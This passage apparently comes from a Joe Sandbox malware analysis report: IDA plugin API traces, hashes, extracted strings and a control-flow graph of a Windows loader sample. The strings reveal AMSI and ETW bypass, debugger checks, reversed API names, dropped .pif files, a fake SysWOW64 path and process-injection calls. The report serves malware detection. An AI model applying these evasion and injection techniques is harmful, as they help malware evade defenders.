                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                              • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                              • API String ID: 2521977463-737317276
                                                                                                                              • Opcode ID: 2dad35d6677cf6aef4682331e0119c060bb5267822111146ccb84450c2f33f21
                                                                                                                              • Instruction ID: 424e101567ae36958a713661a9742a4210e6efadb78643fcd98ea09cb64af909
                                                                                                                              • Opcode Fuzzy Hash: 2dad35d6677cf6aef4682331e0119c060bb5267822111146ccb84450c2f33f21
                                                                                                                              • Instruction Fuzzy Hash: DC012979610208BFEB01EFA8DC41E9A77FEEB48710F5188A0F908D7A00DA34E915CF65
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                              • API String ID: 2719805696-3542721025
                                                                                                                              • Opcode ID: babada01ba72f6502961792299fed96c2bb615a639abf29785f502dc9f27111f
                                                                                                                              • Instruction ID: 5d068c67dd69075e3ea53939c5cb3fa0a28e5a343968b4cd35cc7ed2045faac5
                                                                                                                              • Opcode Fuzzy Hash: babada01ba72f6502961792299fed96c2bb615a639abf29785f502dc9f27111f
                                                                                                                              • Instruction Fuzzy Hash: C10129B5650208BFEB02EF98DC41EAAB7FDEB4D710F518490B508E7A90CA30A915DF61
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                                                • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                                                • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                                                • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                              • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                              • API String ID: 3503870465-2520021413
                                                                                                                              • Opcode ID: 3ed9ce5779dc2fecc656f80c7e02cf88bc90a5b09e12478766569ac9ee9b9f72
                                                                                                                              • Instruction ID: 69fc646870e9092b993a3bdddb9d1549ecd64cb4deb4f9dfdd0ea1fbec644f1f
                                                                                                                              • Opcode Fuzzy Hash: 3ed9ce5779dc2fecc656f80c7e02cf88bc90a5b09e12478766569ac9ee9b9f72
                                                                                                                              • Instruction Fuzzy Hash: A4016275654304BFEB02EFA8DC41E5EB7BEEB49710F5288A0B40897A11DA34AA05CE21
                                                                                                                              APIs
                                                                                                                              • RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
                                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
                                                                                                                              • NtDeleteFile.NTDLL(?), ref: 02B3DA99
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1459852867-0
                                                                                                                              • Opcode ID: 02210ebaa350d019f81ffc59b2cc763abc249d2d7df9a3eab6bec1d0b5cd3215
                                                                                                                              • Instruction ID: 1b2d0c54559cd3be78886de77d0b244fd6553f64d518f05bd122c25809ee05c3
                                                                                                                              • Opcode Fuzzy Hash: 02210ebaa350d019f81ffc59b2cc763abc249d2d7df9a3eab6bec1d0b5cd3215
                                                                                                                              • Instruction Fuzzy Hash: C6016275948349BEEF06EBE0CA41BCD77BDAB44704F5045D2E360E6081DA74AB08CB21
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                                                                              • RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
                                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
                                                                                                                              • NtDeleteFile.NTDLL(?), ref: 02B3DA99
                                                                                                                                • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1694942484-0
                                                                                                                              • Opcode ID: be01b94577fef4a3d937be0ee1a6b3c306fd764ffd6af7b10dedca8ebbf6d470
                                                                                                                              • Instruction ID: 18942b3dffc62d91750dd9baa2dc03d894410d6f9356a24cfd5d7173708cf0fd
                                                                                                                              • Opcode Fuzzy Hash: be01b94577fef4a3d937be0ee1a6b3c306fd764ffd6af7b10dedca8ebbf6d470
                                                                                                                              • Instruction Fuzzy Hash: C0014F71A04309BAEB11EBE0CD42FCEB7BDEB08700F5045E1E614E2590EB74AB088A60
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 02B36CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02B36D39,?,?,?,00000000), ref: 02B36D19
                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,02B36E2C,00000000,00000000,02B36DAB,?,00000000,02B36E1B), ref: 02B36D97
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromInstanceProg
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2151042543-0
                                                                                                                              • Opcode ID: a262c2f2cb060725a7f308ce64205cd0b99b59112f248e29e4f515d8792ac359
                                                                                                                              • Instruction ID: a3673d327e5ae6c5dd63de9fef6e45ba355575fb2bb925006226a1eca47235a8
                                                                                                                              • Opcode Fuzzy Hash: a262c2f2cb060725a7f308ce64205cd0b99b59112f248e29e4f515d8792ac359
                                                                                                                              • Instruction Fuzzy Hash: 60014230208314BEE716EF60CC2296FBBFDE749B10B9208B5F405D2650E6308D08C868
                                                                                                                              APIs
                                                                                                                              • InetIsOffline.URL(00000000,00000000,02B4AF99,?,?,?,000002F7,00000000,00000000), ref: 02B3ECA6
                                                                                                                                • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                                                • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                                                • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 02B38879
                                                                                                                                • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74F60000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74F60000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                                                • Part of subcall function 02B3EB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02B3EF90,UacInitialize,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString), ref: 02B3EB92
                                                                                                                                • Part of subcall function 02B3EB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3EBA4
                                                                                                                                • Part of subcall function 02B3EBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3EBF8
                                                                                                                                • Part of subcall function 02B3EBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3EC0A
                                                                                                                                • Part of subcall function 02B3EBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3EC21
                                                                                                                                • Part of subcall function 02B27E10: GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B
                                                                                                                                • Part of subcall function 02B2C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C758C8,?,02B3FBF6,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession), ref: 02B2C2FB
                                                                                                                                • Part of subcall function 02B3DBA8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DBE3
                                                                                                                                • Part of subcall function 02B3DBA8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DC13
                                                                                                                                • Part of subcall function 02B3DBA8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DC28
                                                                                                                                • Part of subcall function 02B3DBA8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DC54
                                                                                                                                • Part of subcall function 02B3DBA8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DC5D
                                                                                                                                • Part of subcall function 02B27E34: GetFileAttributesA.KERNEL32(00000000,?,02B42A41,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,Initialize), ref: 02B27E3F
                                                                                                                                • Part of subcall function 02B27FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02B42BDF,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,Initialize,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0), ref: 02B27FD5
                                                                                                                                • Part of subcall function 02B3DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
                                                                                                                                • Part of subcall function 02B3DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
                                                                                                                                • Part of subcall function 02B3DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
                                                                                                                                • Part of subcall function 02B3DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73
                                                                                                                                • Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                                                • Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                                                • Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                                                • Part of subcall function 02B38704: LoadLibraryW.KERNEL32(amsi), ref: 02B3870D
                                                                                                                                • Part of subcall function 02B38704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B3876C
                                                                                                                              • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,02B4B328), ref: 02B449AF
                                                                                                                                • Part of subcall function 02B3DA3C: RtlInitUnicodeString.NTDLL(?,?), ref: 02B3DA64
                                                                                                                                • Part of subcall function 02B3DA3C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DAB6), ref: 02B3DA7A
                                                                                                                                • Part of subcall function 02B3DA3C: NtDeleteFile.NTDLL(?), ref: 02B3DA99
                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 02B44BAF
                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 02B44C05
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                                              • Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_2b20000_x.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                              • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                              • API String ID: 2010126900-181751239
                                                                                                                              • Opcode ID: d302ab3202f7e87978f4776264c1707afdf69d7333aaff4ecf7df924c78551a4
                                                                                                                              • Instruction ID: 6d4ca2bb19920ed03925f197ca0d8a346f314e3bc2c78c9ac32b883bb2ca8568
                                                                                                                              • Opcode Fuzzy Hash: d302ab3202f7e87978f4776264c1707afdf69d7333aaff4ecf7df924c78551a4
                                                                                                                              • Instruction Fuzzy Hash: FC24F975A502688FDB12EB64DD80ADE73B6BF84300F1045E6E50DABA14DE30AE8DDF51

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 5348 2b47870-2b47c5f call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24898 5463 2b47c65-2b47e38 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24798 call 2b2494c call 2b24d20 call 2b24d9c CreateProcessAsUserW 5348->5463 5464 2b48ae9-2b48c6c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24898 5348->5464 5573 2b47eb6-2b47fc1 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 5463->5573 5574 2b47e3a-2b47eb1 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 5463->5574 5553 2b48c72-2b48c81 call 2b24898 5464->5553 5554 2b49418-2b4aa1d call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c * 16 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b37b90 call 2b38184 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c ExitProcess 5464->5554 5553->5554 5563 2b48c87-2b48f5a call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3e538 call 2b2480c call 2b2494c call 2b246a4 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b27e10 5553->5563 5821 2b48f60-2b4920d call 2b2480c call 